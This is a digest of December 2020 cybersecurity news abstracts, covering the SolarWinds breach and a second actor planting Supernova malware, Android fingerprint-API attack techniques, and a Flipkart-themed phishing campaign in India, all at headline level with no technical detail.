Abstract
Security researchers have discovered a second threat actor that has exploited the SolarWinds software to plant Supernova and CosmicGale malware on corporate and government networks. (ZDNet)
December 21, 2020
Threat Actors Overcome Fingerprint Scanning Technologies For Malicious Intent
Abstract
Researchers have discovered five new attack techniques, all of which can be launched from zero-permission malicious Android apps, and one of which can even work against all apps that integrate the fingerprint API. (Cyware Alerts - Hacker News)
December 19, 2020
Hackers last year conducted a ‘dry run’ of SolarWinds breach
Abstract
Hackers who breached federal agency networks through software made by a company called SolarWinds appear to have conducted a test run of their broad espionage campaign last year, according to sources with knowledge of the operation. (Yahoo! Finance)
December 18, 2020
Chinese hackers targeted shoppers during Flipkart festive sales
Abstract
Internet users in India were sent spurious links to click on and participate in a contest where individuals could win an OPPO F17 Pro (Matte Black, 8 GB RAM, 128 GB Storage) smartphone. (The Times Of India)
December 18, 2020
Hack Suggests New Scope, Sophistication for Cyberattacks
Abstract
The suspected Russian hack involving SolarWinds software that compromised parts of the U.S. government was executed on a scale that has surprised even veteran security experts. (The Wall Street Journal)